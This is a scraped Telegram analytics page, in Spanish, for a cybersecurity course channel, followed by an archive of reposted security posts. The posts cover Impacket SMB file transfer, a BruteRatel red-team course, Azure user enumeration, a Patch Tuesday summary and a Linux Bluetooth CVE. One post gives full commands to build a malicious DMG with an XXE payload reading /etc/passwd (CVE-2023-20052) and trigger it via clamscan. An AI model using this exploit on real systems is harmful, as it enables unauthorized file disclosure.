¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
All Security Engineering Courses
Ir al canal en Telegram
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!
Mostrar más📈 Análisis del canal de Telegram All Security Engineering Courses
El canal All Security Engineering Courses (@allsecurityengineeringcourses) en el segmento lingüístico de Inglés es un actor destacado. Actualmente la comunidad reúne a 18 795 suscriptores, ocupando la posición 7 162 en la categoría Tecnologías y Aplicaciones y el puesto 35 950 en la región Rusia.
📊 Métricas de audiencia y dinámica
Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 18 795 suscriptores.
Según los últimos datos del 15 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 133, y en las últimas 24 horas de 4, conservando un alto alcance.
- Estado de verificación: No verificado
- Tasa de interacción (ER): El promedio de interacción de la audiencia es 10.04%. Durante las primeras 24 horas tras publicar, el contenido suele obtener 3.00% de reacciones respecto al total de suscriptores.
- Alcance de las publicaciones: Cada publicación recibe en promedio 1 887 visualizaciones. En el primer día suele acumular 563 visualizaciones.
- Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 3.
- Intereses temáticos: El contenido se centra en temas clave como git, strace, github, linux, docker.
📝 Descripción y política de contenido
El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...”
Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 16 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.
18 795
Suscriptores
+424 horas
+357 días
+13330 días
Archivo de publicaciones
Transfer files easily between a Kali Linux and Windows system by running an SMB service on Kali and accessing it from the Windows system.
Run this on Kali:
Impacket-smbserver -smb2support -username vonnie -password 'Password-123!' foo .
Access from the Windows side (by IP):
\\192.168.1.158\foo\
Repost from Red Team Alerts
Transferring files from windows to kali using Impacket smbserver.py doesn't work?
Transferring files from kali to windows is easy with something like python http.server. What about transferring files from windows to kali? I found very useful blog post here and attempted to do similar thing with Impacket smbserver.pyhttps://blog.ropnop.com/transferring-files-from-kali-to-windows/#smbSetup
Kali: 172.16.1.10 Windows: 172.16.1.50Run smbserver on Kali with Impacket smbserver.py
└─$ /usr/share/doc/python3-impacket/examples/smbserver.py share /tmp Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [*] Config file parsedHowever, whenever I try on Windows, I'm getting "System error 53 has occurred, The network path was not found" as follows:
C:\>net view \\172.16.1.10\ System error 53 has occurred. The network path was not found.Here is the message on Impacket smbserver.py
[*] Incoming connection (172.16.1.50,56201) [*] Closing down connection (172.16.1.50,56201) [*] Remaining connections []Then, I tried again with \share, but still getting the same error
C:\>net view \\172.16.1.10\share System error 53 has occurred. The network path was not found.What's wrong and what should I do to make this right? Discuss on Reddit: https://ift.tt/xlSZ4m2 @redteamalerts
Webinar Assessing the Security of Your Active Directory Privileged Account Risks and Controls
🔥Red Team and Adversary Simulation with BruteRatel C4 🔥
💥Add this to your personal collection to view offline!💥
💥 Red Team and Adversary Simulation with BruteRatel C4 💥
My big THANK YOU to all following my Telegram channel!
Also here: https://www.youtube.com/playlist?list=PLl7h-59muprN-LS_WRKq1ldsknCDJm25O
UPCOMING UPLOAD...
Repost from RT x TEAM </>
@nyxgeek
I think most pentesters have used the classic OWA time-based user enum at some point. Or time-based enum in Lync.
What if I told you that time-based user enum lives on in Azure? And it's tied to Basic Auth.
Basic Auth is dead. Long live Basic Auth!
https://trustedsec.com/blog/kicking-it-old-school-with-time-based-enumeration-in-azure
CVE-2023-20052 exploit
(https://github.com/nokn0wthing/CVE-2023-25002)To create malicious DMG file:
$ git clone https://github.com/nokn0wthing/CVE-2023-20052.git
$ cd CVE-2023-20052
$ sudo docker build -t cve-2023-20052 .
$ sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash
$ genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
$ bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg
To trigger exploit:
$ clamscan --debug exploit.dmg
Hello everyone! This episode will be about Microsoft Patch Tuesday for July 2023, including vulnerabilities that were added between June and July Patch Tuesdays.
Vulristics improvements
00:11 Works faster
01:31 Microsoft ADVs
02:45 Comments Table
TOP
04:09 Remote Code Execution – Microsoft Office (CVE-2023-36884)
05:06 Security Feature Bypass – Windows SmartScreen (CVE-2023-32049)
05:48 Security Feature Bypass – Microsoft Outlook (CVE-2023-35311)
06:37 Elevation of Privilege – Windows Error Reporting Service (CVE-2023-36874)
07:16 Elevation of Privilege – Windows MSHTML Platform (CVE-2023-32046)
Other RCEs
08:10 Remote Code Execution – Windows Active Directory Certificate Services (AD CS) (CVE-2023-35350)
09:01 Remote Code Execution – Microsoft Message Queuing (CVE-2023-32057, CVE-2023-35309)
09:44 Remote Code Execution – Windows Routing and Remote Access Service (RRAS) (CVE-2023-35365, CVE-2023-35366, CVE-2023-35367)
10:24 Remote Code Execution – Windows Layer-2 Bridge Network Driver (CVE-2023-35315)
10:57 Remote Code Execution – Microsoft SharePoint (CVE-2023-33134, CVE-2023-33157, CVE-2023-33159, CVE-2023-33160)
11:42 Remote Code Execution – Windows Pragmatic General Multicast (PGM) (CVE-2023-35297)
🎞 Video
(https://youtu.be/vvQFMHt64X4)🎞 Video2 (for Russia)
(https://vk.com/video-149273431_456239131)📘 (https://avleonov.com/vulristics_reports/ms_patch_tuesday_june2023_report_with_comments_ext_img.html)Blogpost
(https://avleonov.com/2023/07/28/microsoft-patch-tuesday-july-2023-vulristics-improvements-office-rce-sfb-smartscreen-and-outlook-eop-mshtml-and-ers-other-rces/)🗒 Vulristics report
(https://avleonov.com/vulristics_reports/ms_patch_tuesday_july2023_report_with_comments_ext_img.html)На русском
(https://t.me/avleonovrus/722)@avleonovcom #AD #ADV #DarkReading #EoP #ERS #Kaspersky #KrebsOnSecurity #Layer2Bridge #Microsoft #MicrosoftOffice #MSHTML #MSMQ #Outlook #PGM #Qualys #Rapid7 #RCE #RRAS #SFB #SharePoint #SmartScreen #SophosNakedSecurity #Tenable #TheHackerNews #Vulristics #ZDI
YouTube (https://youtu.be/vvQFMHt64X4)
Microsoft Patch Tuesday July 2023: Vulristics improvements, Office RCE, SFB SmartScreen and Outlook
Hello everyone! This episode will be about Microsoft Patch Tuesday for July 2023, including vulnerabilities that were added between
Linux Bluetooth: Unauthorized management command execution (https://github.com/lrh2000/CVE-2023-2002) (CVE-2023-2002, PoC exploit (https://github.com/lrh2000/CVE-2023-2002/blob/master/exp/bt_power.c) included)
An insufficient permission check has been found in the Bluetooth subsystem of the Linux kernel when handling ioctl system calls of HCI sockets. This causes tasks without the proper CAP_NET_ADMIN capability can easily mark HCI sockets as trusted. Trusted sockets are intended to enable the sending and receiving of management commands and events, such as pairing or connecting with a new device. As a result, unprivileged users can acquire a trusted socket, leading to unauthorized execution of management commands. The exploit requires only the presence of a set of commonly used setuid programs.
If successfully exploited, the identified vulnerability has the potential to compromise the confidentiality, integrity, and availability of Bluetooth communication. Attackers can exploit this vulnerability to pair the controller with malicious devices, even if the Bluetooth service is disabled or not installed.
